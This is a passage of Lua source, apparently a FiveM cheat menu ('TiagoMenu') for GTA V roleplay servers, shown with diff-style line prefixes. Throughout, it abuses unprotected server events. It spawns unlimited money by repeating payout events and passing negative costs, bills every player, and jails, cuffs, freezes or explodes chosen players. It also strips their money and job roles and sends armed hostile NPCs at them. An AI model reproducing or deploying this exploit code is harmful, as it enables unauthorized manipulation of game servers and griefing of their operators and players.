- if result then
- TriggerServerEvent ('taxi:success', result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~14") then
- TriggerServerEvent('esx_pilot:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_pilot:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_pilot:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_pilot:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_pilot:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_pilot:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_pilot:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- TriggerServerEvent('esx_taxijob:success')
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~15") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent("esx_garbagejob:pay", result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~16") then
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- TriggerServerEvent('paycheck:salary')
- elseif TiagoMenu.Button("~s~Bank ~r~~h~Deposit") then
- local result = KeyboardInput("Enter amount of money", "", 100)
- if result then
- TriggerServerEvent("bank:deposit", result)
- end
- elseif TiagoMenu.Button("~s~Bank ~r~~h~Withdraw ") then
- local result = KeyboardInput("Enter amount of money", "", 100)
- if result then
- TriggerServerEvent("bank:withdraw", result)
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("ESXMisc") then
- if TiagoMenu.Button("~g~~h~ESX ~r~SEND EVERYONE A BILL") then
- local amount = KeyboardInput("Enter Amount", "", 100000000)
- local name = KeyboardInput("Enter the name of the Bill", "", 100000000)
- if amount and name then
- for i = 0, 128 do
- TriggerServerEvent('esx_billing:sendBill', GetPlayerServerId(i), "Purposeless", name, amount)
- end
- end
- elseif TiagoMenu.Button("~g~~h~ESX ~w~Harvest FixKit") then
- TriggerServerEvent("esx_mechanicjob:startHarvest")
- elseif TiagoMenu.Button("~g~~h~ESX ~w~Get all licenses Drive") then
- TriggerServerEvent("dmv:success")
- TriggerServerEvent('esx_weashopjob:addLicense', 'tazer')
- TriggerServerEvent('esx_weashopjob:addLicense', 'ppa')
- TriggerServerEvent('esx_weashopjob:addLicense', 'ppa2')
- TriggerServerEvent('esx_weashopjob:addLicense', 'drive_bike')
- TriggerServerEvent('esx_weashopjob:addLicense', 'drive_truck')
- TriggerServerEvent('esx_dmvschool:addLicense', 'dmv')
- TriggerServerEvent('esx_dmvschool:addLicense', 'drive')
- TriggerServerEvent('esx_dmvschool:addLicense', 'drive_bike')
- TriggerServerEvent('esx_dmvschool:addLicense', 'drive_truck')
- TriggerServerEvent('esx_airlines:addLicense', 'helico')
- TriggerServerEvent('esx_airlines:addLicense', 'avion')
- elseif TiagoMenu.Button("~g~~h~ESX ~w~Craft FixKit") then
- TriggerServerEvent("esx_mechanicjob:startCraft")
- elseif TiagoMenu.Button("~h~Send Discord Message") then
- local Message = KeyboardInput("Enter message to send", "", 100)
- TriggerServerEvent("DiscordBot:playerDied", Message, "1337")
- drawNotification("The message:~n~" .. Message .. "~n~Has been ~g~sent!")
- elseif TiagoMenu.Button("~h~Send Police Car Advert") then
- TriggerServerEvent("esx:enterpolicecar",GetDisplayNameFromVehicleModel(GetEntityModel(GetVehiclePedIsIn(GetPlayerPed(-1), 0))))
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("MiscServerOptions") then
- if TiagoMenu.Button("~h~Send Discord Message") then
- local Message = KeyboardInput("Enter message to send", "", 100)
- TriggerServerEvent("DiscordBot:playerDied", Message, "1337")
- drawNotification("The message:~n~" .. Message .. "~n~Has been ~g~sent!")
- elseif TiagoMenu.Button("~h~Send Police Car Advert") then
- TriggerServerEvent("esx:enterpolicecar",GetDisplayNameFromVehicleModel(GetEntityModel(GetVehiclePedIsIn(GetPlayerPed(-1), 0))))
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("VRPOptions") then
- if TiagoMenu.Button("~r~~h~VRP ~s~Give Money ~ypayGarage") then
- local result = KeyboardInput("Enter amount of money USE AT YOUR OWN RISK", "", 100)
- if result then
- TriggerServerEvent("lscustoms:payGarage", {costs = -result})
- end
- elseif TiagoMenu.Button("~r~~h~VRP ~g~WIN ~s~Slot Machine") then
- local result = KeyboardInput("Enter amount of money USE AT YOUR OWN RISK", "", 100)
- if result then
- TriggerServerEvent("vrp_slotmachine:server:2", result)
- end
- elseif TiagoMenu.Button("~r~~h~VRP ~s~Get driving license") then
- TriggerServerEvent("dmv:success")
- elseif TiagoMenu.Button("~r~~h~VRP ~s~Bank Deposit") then
- local result = KeyboardInput("Enter amount of money", "", 100)
- if result then
- TriggerServerEvent("bank:deposit", result)
- end
- elseif TiagoMenu.Button("~r~~h~VRP ~s~Bank Withdraw ") then
- local result = KeyboardInput("Enter amount of money", "", 100)
- if result then
- TriggerServerEvent("bank:withdraw", result)
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("ESXDrugs") then
- if TiagoMenu.Button("~h~~g~Harvest ~g~Weed ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startHarvestWeed")
- TriggerServerEvent("esx_drugs:startHarvestWeed")
- TriggerServerEvent("esx_drugs:startHarvestWeed")
- TriggerServerEvent("esx_drugs:startHarvestWeed")
- TriggerServerEvent("esx_drugs:startHarvestWeed")
- elseif TiagoMenu.Button("~h~~g~Transform ~g~Weed ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startTransformWeed")
- TriggerServerEvent("esx_drugs:startTransformWeed")
- TriggerServerEvent("esx_drugs:startTransformWeed")
- TriggerServerEvent("esx_drugs:startTransformWeed")
- TriggerServerEvent("esx_drugs:startTransformWeed")
- elseif TiagoMenu.Button("~h~~g~Sell ~g~Weed ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startSellWeed")
- TriggerServerEvent("esx_drugs:startSellWeed")
- TriggerServerEvent("esx_drugs:startSellWeed")
- TriggerServerEvent("esx_drugs:startSellWeed")
- TriggerServerEvent("esx_drugs:startSellWeed")
- elseif TiagoMenu.Button("~h~~w~Harvest ~w~Coke ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startHarvestCoke")
- TriggerServerEvent("esx_drugs:startHarvestCoke")
- TriggerServerEvent("esx_drugs:startHarvestCoke")
- TriggerServerEvent("esx_drugs:startHarvestCoke")
- TriggerServerEvent("esx_drugs:startHarvestCoke")
- elseif TiagoMenu.Button("~h~~w~Transform ~w~Coke ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startTransformCoke")
- TriggerServerEvent("esx_drugs:startTransformCoke")
- TriggerServerEvent("esx_drugs:startTransformCoke")
- TriggerServerEvent("esx_drugs:startTransformCoke")
- TriggerServerEvent("esx_drugs:startTransformCoke")
- elseif TiagoMenu.Button("~h~~w~Sell ~w~Coke ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startSellCoke")
- TriggerServerEvent("esx_drugs:startSellCoke")
- TriggerServerEvent("esx_drugs:startSellCoke")
- TriggerServerEvent("esx_drugs:startSellCoke")
- TriggerServerEvent("esx_drugs:startSellCoke")
- elseif TiagoMenu.Button("~h~~r~Harvest Meth ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startHarvestMeth")
- TriggerServerEvent("esx_drugs:startHarvestMeth")
- TriggerServerEvent("esx_drugs:startHarvestMeth")
- TriggerServerEvent("esx_drugs:startHarvestMeth")
- TriggerServerEvent("esx_drugs:startHarvestMeth")
- elseif TiagoMenu.Button("~h~~r~Transform Meth ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startTransformMeth")
- TriggerServerEvent("esx_drugs:startTransformMeth")
- TriggerServerEvent("esx_drugs:startTransformMeth")
- TriggerServerEvent("esx_drugs:startTransformMeth")
- TriggerServerEvent("esx_drugs:startTransformMeth")
- elseif TiagoMenu.Button("~h~~r~Sell Meth ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startSellMeth")
- TriggerServerEvent("esx_drugs:startSellMeth")
- TriggerServerEvent("esx_drugs:startSellMeth")
- TriggerServerEvent("esx_drugs:startSellMeth")
- TriggerServerEvent("esx_drugs:startSellMeth")
- elseif TiagoMenu.Button("~h~~p~Harvest Opium ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startHarvestOpium")
- TriggerServerEvent("esx_drugs:startHarvestOpium")
- TriggerServerEvent("esx_drugs:startHarvestOpium")
- TriggerServerEvent("esx_drugs:startHarvestOpium")
- TriggerServerEvent("esx_drugs:startHarvestOpium")
- elseif TiagoMenu.Button("~h~~p~Transform Opium ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startTransformOpium")
- TriggerServerEvent("esx_drugs:startTransformOpium")
- TriggerServerEvent("esx_drugs:startTransformOpium")
- TriggerServerEvent("esx_drugs:startTransformOpium")
- TriggerServerEvent("esx_drugs:startTransformOpium")
- elseif TiagoMenu.Button("~h~~p~Sell Opium ~c~(x5)") then
- TriggerServerEvent("esx_drugs:startSellOpium")
- TriggerServerEvent("esx_drugs:startSellOpium")
- TriggerServerEvent("esx_drugs:startSellOpium")
- TriggerServerEvent("esx_drugs:startSellOpium")
- TriggerServerEvent("esx_drugs:startSellOpium")
- elseif TiagoMenu.Button("~h~~g~Money Wash ~c~(x10)") then
- TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
- TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
- TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
- TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
- TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
- TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
- TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
- TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
- TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
- TriggerServerEvent("esx_blanchisseur:startWhitening", 85)
- elseif TiagoMenu.Button("~r~~h~Stop all ~c~(Drugs)") then
- TriggerServerEvent("esx_drugs:stopHarvestCoke")
- TriggerServerEvent("esx_drugs:stopTransformCoke")
- TriggerServerEvent("esx_drugs:stopSellCoke")
- TriggerServerEvent("esx_drugs:stopHarvestMeth")
- TriggerServerEvent("esx_drugs:stopTransformMeth")
- TriggerServerEvent("esx_drugs:stopSellMeth")
- TriggerServerEvent("esx_drugs:stopHarvestWeed")
- TriggerServerEvent("esx_drugs:stopTransformWeed")
- TriggerServerEvent("esx_drugs:stopSellWeed")
- TriggerServerEvent("esx_drugs:stopHarvestOpium")
- TriggerServerEvent("esx_drugs:stopTransformOpium")
- TriggerServerEvent("esx_drugs:stopSellOpium")
- drawNotification("~r~Everything is now stopped.")
- elseif TiagoMenu.Button("~h~~g~Sell Money Wash ~s~new") then
- local result = KeyboardInput("Enter amount wash money ", "", 100000)
- if result then
- TriggerServerEvent('esx_moneywash:washMoney', result)
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("RecrutarPlayers") then
- for i = 0, 128 do
- if NetworkIsPlayerActive(i) and GetPlayerServerId(i) ~= 0 and TiagoMenu.MenuButton("~h~~r~-» ~s~"..GetPlayerName(i).."", 'RecrutarPlayersOptions') then
- SelectedPlayer = i
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("RecrutarPlayersOptions") then
- TiagoMenu.SetSubTitle("RecrutarPlayersOptions", "Recrutar Players options [" .. GetPlayerName(SelectedPlayer) .. "]")
- if TiagoMenu.Button("~r~Remove job") then
- TriggerServerEvent("NB:destituerplayer",GetPlayerServerId(SelectedPlayer))
- elseif TiagoMenu.Button("~s~Recruit~c~~h~ Mechanic") then
- TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), "mecano", 0)
- TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "mecano", 0)
- TriggerServerEvent('Corujas RP-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "mecano", 0)
- TriggerServerEvent('esx_society:getJob', GetPlayerServerId(SelectedPlayer), "mecano", 0)
- elseif TiagoMenu.Button("~s~Recruit~b~~h~ Police") then
- TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), "police", 0)
- TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "police", 0)
- elseif TiagoMenu.Button("~s~Recruit~c~~h~ Mafia") then
- TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), "mafia", 0)
- TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "mafia", 0)
- elseif TiagoMenu.Button("~s~Recruit~p~~h~ Gang") then
- TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), "gang", 0)
- TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "gang", 0)
- elseif TiagoMenu.Button("~s~Recruit~r~~h~ Inem") then
- TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), "ambulance", 0)
- TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer', GetPlayerServerId(SelectedPlayer), "ambulance", 0)
- elseif TiagoMenu.Button("~h~Custom Recruit") then
- local reason = KeyboardInput("Enter the job name", "", 100)
- local reason2 = KeyboardInput("Enter the nivel job number 0-10", "", 10)
- if reason and reason2 then
- TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), reason, reason2)
- TriggerServerEvent('Esx-MenuPessoal:Boss_recruterplayer',GetPlayerServerId(SelectedPlayer), reason, reason2)
- TriggerServerEvent('Corujas RP-MenuPessoal:Boss_recruterplayer',GetPlayerServerId(SelectedPlayer), reason, reason2)
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("OnlinePlayerMenu") then
- for i = 0, 128 do
- if NetworkIsPlayerActive(i) and GetPlayerServerId(i) ~= 0 and TiagoMenu.MenuButton("~h~ID: ~r~[ "..GetPlayerServerId(i).." ] ~s~"..GetPlayerName(i).."~h~~y~ » "..(IsPedDeadOrDying(GetPlayerPed(i), 1) and "~s~[~r~DEAD~s~]" or "~s~[ ~g~ALIVE~s~ ]"), 'PlayerOptionsMenu') then
- SelectedPlayer = i
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("PlayerOptionsMenu") then
- TiagoMenu.SetSubTitle("PlayerOptionsMenu", "~h~Player ~s~~r~[" .. GetPlayerName(SelectedPlayer) .. "~r~]")
- if TiagoMenu.Button("~h~~r~[~s~ SPECTATE ~h~~r~]", (Spectating and "~r~[ON]")) then
- SpectatePlayer(SelectedPlayer)
- elseif TiagoMenu.Button("Teleport To Player") then
- local Entity = IsPedInAnyVehicle(PlayerPedId(), false) and GetVehiclePedIsUsing(PlayerPedId()) or PlayerPedId()
- SetEntityCoords(Entity, GetEntityCoords(GetPlayerPed(SelectedPlayer)), 0.0, 0.0, 0.0, false)
- elseif TiagoMenu.Button("~g~Spam Msg") then
- local cX=KeyboardInput("Enter message to send","",100)
- local cY=GetPlayerName(selectedPlayer)
- if cX then
- TriggerServerEvent("_chat:messageEntered",cY,{0,0x99,255},cX)
- end
- elseif TiagoMenu.CheckBox(
- "~h~Freeze Player~r~ New",
- freezePlayer,
- function(enabled)
- freezePlayer = enabled
- end)
- then
- elseif TiagoMenu.Button("~g~Give ~s~Money") then
- local result = KeyboardInput("Enter amount of money to give", "", 100000000)
- if result then
- TriggerServerEvent('esx:giveInventoryItem', GetPlayerServerId(SelectedPlayer), "item_money", "money", result)
- end
- elseif TiagoMenu.Button("~r~Remove ~s~Money") then
- local result = KeyboardInput("Enter amount of money to give", "", 100000000)
- if result then
- TriggerServerEvent('esx:removeInventoryItem', GetPlayerServerId(SelectedPlayer), "item_money", "money", result)
- end
- elseif TiagoMenu.Button("~r~Explode") then
- AddExplosion(GetEntityCoords(GetPlayerPed(SelectedPlayer)), 2, 100000.0, true, false, 100000.0)
- elseif TiagoMenu.Button("~g~Revive ~g~ESX") then
- TriggerServerEvent("esx_ambulancejob:revive", GetPlayerServerId(SelectedPlayer))
- TriggerServerEvent("whoapd:revive", GetPlayerServerId(SelectedPlayer))
- TriggerServerEvent("paramedic:revive", GetPlayerServerId(SelectedPlayer))
- TriggerServerEvent("ems:revive", GetPlayerServerId(SelectedPlayer))
- TriggerEvent('esx_ambulancejob:revive', GetPlayerServerId(SelectedPlayer))
- TriggerServerEvent('esx_ambulancejob:revive', GetPlayerServerId(SelectedPlayer))
- elseif TiagoMenu.Button("~g~Revive ~b~VRP") then CreatePickup(GetHashKey("PICKUP_HEALTH_STANDARD"), GetEntityCoords(GetPlayerPed(SelectedPlayer))) elseif TiagoMenu.Button("Give ~b~Armour ") then CreatePickup(GetHashKey("PICKUP_ARMOUR_STANDARD"), GetEntityCoords(GetPlayerPed(SelectedPlayer))) elseif TiagoMenu.Button("~h~~r~Kill ~s~Player") then AddExplosion(GetEntityCoords(GetPlayerPed(SelectedPlayer)), 4, 1337.0, false, true, 0.0)
- elseif TiagoMenu.Button('Fire') then
- FirePlayer(SelectedPlayer)
- elseif TiagoMenu.Button("~b~Open inventory ~s~new") then
- TriggerEvent("esx_inventoryhud:openPlayerInventory", GetPlayerServerId(SelectedPlayer), GetPlayerName(SelectedPlayer))
- elseif TiagoMenu.Button("Jail") then
- TriggerServerEvent("esx_jailer:sendToJail", GetPlayerServerId(SelectedPlayer), 45 * 60)
- TriggerServerEvent("esx_jail:sendToJail", GetPlayerServerId(SelectedPlayer), 45 * 60)
- TriggerServerEvent("js:jailuser", GetPlayerServerId(SelectedPlayer), 45 * 60, "dude weed")
- TriggerServerEvent("esx-qalle-jail:jailPlayer", GetPlayerServerId(SelectedPlayer), 45 * 60, "dude weed")
- elseif TiagoMenu.Button("Unjail") then
- TriggerServerEvent("esx_jailer:sendToJail", GetPlayerServerId(SelectedPlayer), 0)
- TriggerServerEvent("esx_jail:sendToJail", GetPlayerServerId(SelectedPlayer), 0)
- TriggerServerEvent("esx_jail:unjailQuest", GetPlayerServerId(SelectedPlayer))
- TriggerServerEvent("js:removejailtime", GetPlayerServerId(SelectedPlayer))
- TriggerServerEvent("esx-qalle-jail:unJailPlayer", GetPlayerServerId(SelectedPlayer), 0)
- elseif TiagoMenu.Button("~g~Give All Weapons") then
- for i = 1, #allWeapons do
- GiveWeaponToPed(GetPlayerPed(SelectedPlayer), GetHashKey(allWeapons[i]), 1000, false, false)
- end
- elseif TiagoMenu.Button("~r~Remove All Weapons") then
- RemoveAllPedWeapons(PlayerPedId(-1), true)
- elseif TiagoMenu.MenuButton("Weapon Menu", "SingleWepPlayer") then
- elseif TiagoMenu.Button("Spawn Vehicle") then
- local ped = GetPlayerPed(SelectedPlayer)
- local ModelName = KeyboardInput("Enter Vehicle Spawn Name", "", 100)
- if ModelName and IsModelValid(ModelName) and IsModelAVehicle(ModelName) then
- RequestModel(ModelName)
- while not HasModelLoaded(ModelName) do
- Citizen.Wait(0)
- end
- local veh = CreateVehicle(GetHashKey(ModelName), GetEntityCoords(ped), GetEntityHeading(ped), true, true)
- else
- drawNotification("~r~Model is not valid!")
- end
- elseif TiagoMenu.Button('~h~Clone Car') then
- ClonePedVeh()
- elseif TiagoMenu.Button("~b~Cuff Player") then
- TriggerServerEvent("OG_cuffs:cuffCheckNearest", GetPlayerPed(SelectedPlayer))
- TriggerServerEvent("CheckHandcuff", GetPlayerPed(SelectedPlayer))
- TriggerServerEvent('cuffServer', GetPlayerPed(SelectedPlayer))
- TriggerServerEvent("cuffGranted", GetPlayerPed(SelectedPlayer))
- TriggerServerEvent("police:cuffGranted", GetPlayerPed(SelectedPlayer))
- TriggerServerEvent('esx_handcuffs:cuffing', GetPlayerPed(SelectedPlayer))
- TriggerServerEvent('esx_policejob:handcuff', GetPlayerPed(SelectedPlayer))
- elseif TiagoMenu.Button('~h~Spawn Swat ~r~AK') then
- for i = 0, 32 do
- local coords = GetEntityCoords(GetPlayerPed(SelectedPlayer))
- RequestModel(GetHashKey('s_m_y_swat_01'))
- Citizen.Wait(50)
- if HasModelLoaded(GetHashKey('s_m_y_swat_01')) then
- local ped =
- CreatePed(21, GetHashKey('s_m_y_swat_01'), coords.x, coords.y, coords.z, 0, true, false)
- if DoesEntityExist(ped) and not IsEntityDead(GetPlayerPed(SelectedPlayer)) then
- RequestNetworkControl(ped)
- GiveWeaponToPed(ped, GetHashKey('WEAPON_ASSAULTRIFLE'), 9999, 1, 1)
- SetPedCanSwitchWeapon(ped, true)
- makePedHostile(ped, SelectedPlayer, 0, 0)
- TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
- elseif IsEntityDead(GetPlayerPed(SelectedPlayer)) then
- TaskCombatHatedTargetsInArea(ped, coords.x, coords.y, coords.z, 500)
- else
- Citizen.Wait(0)
- end
- else
- Citizen.Wait(0)
- end
- end
- elseif TiagoMenu.Button('~h~Spawn Wade ~r~RPG') then
- for i = 0, 32 do
- local coords = GetEntityCoords(GetPlayerPed(SelectedPlayer))
- RequestModel(GetHashKey('ig_wade'))
- Citizen.Wait(50)
- if HasModelLoaded(GetHashKey('ig_wade')) then
- local ped =
- CreatePed(21, GetHashKey('ig_wade'), coords.x, coords.y, coords.z, 0, true, false)
- if DoesEntityExist(ped) and not IsEntityDead(GetPlayerPed(SelectedPlayer)) then
- RequestNetworkControl(ped)
- GiveWeaponToPed(ped, GetHashKey('WEAPON_RPG'), 9999, 1, 1)
- SetPedCanSwitchWeapon(ped, true)
- makePedHostile(ped, SelectedPlayer, 0, 0)
- TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
- elseif IsEntityDead(GetPlayerPed(SelectedPlayer)) then
- TaskCombatHatedTargetsInArea(ped, coords.x, coords.y, coords.z, 500)
- else
- Citizen.Wait(0)
- end
- else
- Citizen.Wait(0)
- end
- end
- elseif TiagoMenu.Button('~h~Spawn Swat in car ~r~Attack') then
- local vehlist = {'Nero', 'Deluxo', 'Raiden', 'Bati2', "SultanRS", "TA21", "Tiago", "ZR380", "Streiter", "Neon", "Italigto", "Nero2", "Fmj", "le7b", "prototipo", "cyclone", "khanjali", "STROMBERG", "BARRAGE", "COMET5"}
- local veh = vehlist[math.random(#vehlist)]
- for i = 0, 1 do
- local pos = GetEntityCoords(GetPlayerPed(SelectedPlayer))
- local pitch = GetEntityPitch(GetPlayerPed(SelectedPlayer))
- local roll = GetEntityRoll(GetPlayerPed(SelectedPlayer))
- local yaw = GetEntityRotation(GetPlayerPed(SelectedPlayer)).z
